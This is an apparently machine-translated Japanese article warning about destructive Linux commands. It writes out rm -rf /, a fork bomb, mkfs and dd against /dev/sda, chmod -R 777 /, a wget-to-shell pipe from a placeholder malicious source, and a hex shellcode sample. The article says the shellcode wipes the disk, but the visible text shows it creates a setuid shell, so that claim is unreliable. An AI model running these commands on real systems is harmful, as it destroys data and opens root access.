最も危険なコマンド - Linux では絶対に実行しないでください


コマンドライン インターフェイスは、Linux システムを管理するための強力で便利なユーティリティです。これは、特にグラフィカル インターフェイスを持たないヘッドレス システムを管理する場合に、システムを実行するための高速で多目的な方法を提供します。

システムの管理には便利ですが、コマンド ラインにはリスクが伴います。不適切なコマンドを実行すると、システムに損害を与え、回復不能な損傷を与える可能性があります。このガイドでは、システムで実行することを考えるべきではない、最もリスクの高いコマンドのリストをまとめました。

1. rm -rf/コマンド

rm コマンドは、使用される引数に応じてファイルとディレクトリを削除するために使用される Linux コマンドです。ただし、rm コマンドを使用する場合は、わずかなタイプミスやミスが回復不能なシステムの損傷につながる可能性があるため、細心の注意を払う必要があります。

-rf / オプションを使用してルートとして実行すると、コマンドは、Linux で最も高いルート (/) から始まる、システム上のすべてのファイルとディレクトリを再帰的に削除します。ファイル階層構造。簡単に言えば、rm -rf / コマンドはシステムを完全に消去し、システムを破損して回復不能にします。

rm コマンドで使用されるオプションのいくつかは次のとおりです。

  • Linux の rm コマンドは、ファイルを削除するために使用されます。
  • rm -r コマンドは、空のフォルダーであってもフォルダーを再帰的に削除します。
  • rm -f コマンドは、確認せずに「読み取り専用ファイル」を削除します。
  • rm -rf/: ルート ディレクトリ内のすべてを強制的に削除します。
  • rm -rf * : 現在のディレクトリ/作業ディレクトリ内のすべてを強制的に削除します。
  • rm -rf . : 現在のフォルダーとサブフォルダーを強制的に削除します。

実際、通常のユーザーとしてコマンドを実行すると、端末に 2 つの警告が表示されます。

「rm」コマンドによるファイルの誤った削除を回避するには、\.bashrc ファイルで「rm」コマンドのエイリアスを「rm -i」として作成します。削除するたびに確認を求められます。

2. :(){:|:&};: コマンド

上記は実際にはフォーク爆弾です。 : という関数を作成することで動作します。この関数は、フォアグラウンドで 1 回、バックグラウンドで 1 回、自分自身を 2 回呼び出します。この関数は繰り返し実行され、実行中にすべてのシステム リソースが消費され、システム クラッシュが発生します。

実際、フォーク爆弾コマンドは本質的に DoS (サービス拒否) 攻撃の一種です。 Wabbit または Rabbit ウイルスとも呼ばれます。最悪の部分は、この攻撃を開始するために root になる必要がないことです。

ありがたいことに、ローカル ユーザーが実行するプロセスの数を約 4000 に制限することで、この攻撃から身を守ることができます。

これを行うには、次のコマンドを実行します。

$ ulimit -S -u 4000

これは、後で次のコマンドを使用して確認できます。

$ ulimit -u

3. コマンド > /dev/sda

コマンドの後に >/dev/sda を実行すると、ハード ドライブの /dev/sda ブロックが上書きされます。このブロックにはファイルシステムのデータが含まれており、上書きされるとシステムが損傷し、回復不能になります。

4.mv フォルダ /dev/null

ディレクトリまたはファイルを /dev/null に移動することも、試みてはならない有害な操作です。 /dev/null ファイルは、null デバイスまたは「ブラック ホール」として知られる特殊なタイプのファイルです。 /dev/null に移動されたものはすべて破棄され、破棄されます。

次のコマンドは、ユーザーのホーム ディレクトリのすべてのコンテンツを /dev/null に移動し、その結果、ユーザーのホーム ディレクトリに含まれるすべてのデータを破棄します。

# mv /home/user/* /dev/null

5. wget http://悪意のあるソース -O- |し

wget コマンドは、Web サーバーまたはファイル サーバーからファイルをダウンロードするコマンドです。上記のコマンドは、悪意のあるソースからスクリプトをダウンロードして実行します。

6. mkfs.ext3 /dev/sda

mkfs コマンドは、フォーマットされたストレージ デバイス (ほとんどの場合、ハード ディスク ドライブのパーティション) に新しいファイル システム (ext2、ext3、ext4 など) を作成します。パーティションで mkfs コマンドを実行すると、そこに保存されているすべてのデータが消去されます。

ディスク パーティションのフォーマットには便利ですが、ドライブ全体 (mkfs.ext3 /dev/sda など) をフォーマットすると、システムがクラッシュし、回復不能な状態になります。これは、個人データとともにすべてのシステム ファイルを破壊するために発生します。

コマンドは、以下に示すように他の形式を取ることもできます。

# mkfs.ext4 /dev/sda
# mkfs.xfs /dev/sda
# mkfs.btrfs /dev/sda

7. > file コマンド

> ファイルは、ファイルの内容を消去して空白のままにします。 cat /dev/null > file コマンドと同義です。したがって、Linux システムでリダイレクト演算子を使用する場合は注意が必要です。

以下は、このコマンドがテキスト ファイルを上書きする方法のデモです。関連するファイルが構成ファイルである場合、このコマンドが引き起こす惨事を想像することができます。

8. ^foo^bar

^foo^bar コマンドは、実行方法によっては便利であると同時に危険でもあります。以前に実行したコマンドを編集して再度実行することはできますが、コマンドを実行する前にコマンドに加えられた変更に熱心でない場合、悲惨な結果になる可能性があります。

9. dd if=/dev/random of=/dev/sda

上記のコマンドは /dev/sda ブロックを一掃し、ランダムなジャンク データをブロックに書き込みます。システムは、一貫性のない回復不能な段階に置かれます。

10. Chmod -R 777 /

Linux システムがすぐにクラッシュするわけではありませんが、chmod -R 777 / コマンドは、Linux システム上のすべてのファイルに対して、ルートから始まるすべての権限 (読み取り、書き込み、および実行) を再帰的に割り当てます。

これにより、すべての重要な構成ファイルとその他のファイルがすべてのユーザーに効果的に公開され、システムに大きなセキュリティ リスクが生じます。悪意のある人は、重要なファイルをいじくり回して、システムを簡単に壊すことができます。

11. 隠しコマンド

以下のコマンドは、(rm -rf) の上の最初のコマンドに他なりません。ここでは、無知なユーザーがだまされる可能性があるように、コードは 16 進数で隠されています。ターミナルで以下のコードを実行すると、ルート パーティションが消去されます。

このコマンドは、脅威が隠されている可能性があり、通常は検出できない場合があることを示しています。自分が何をしていて、その結果がどうなるかを認識している必要があります。不明なソースからのコードをコンパイル/実行しないでください。

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

注: 上記のコマンドは、Linux ターミナルやシェル、または友人や学校のコンピューターで実行しないでください。それらをテストする場合は、仮想マシンで実行してください。

上記のコマンドの実行による不整合またはデータ損失は、記事の作成者も Tecmint も責任を負わないシステムを破壊します。

それは今のところすべてです。私はすぐにまたここに来て、皆さんが読むのが大好きな興味深い記事をもう 1 つ紹介します。それまでは、Tecmint に引き続きご期待ください。

他のそのような危険な Linux コマンドを知っていて、それらをリストに追加してほしい場合は、コメント セクションからお知らせください。また、貴重なフィードバックをお寄せいただくことを忘れないでください。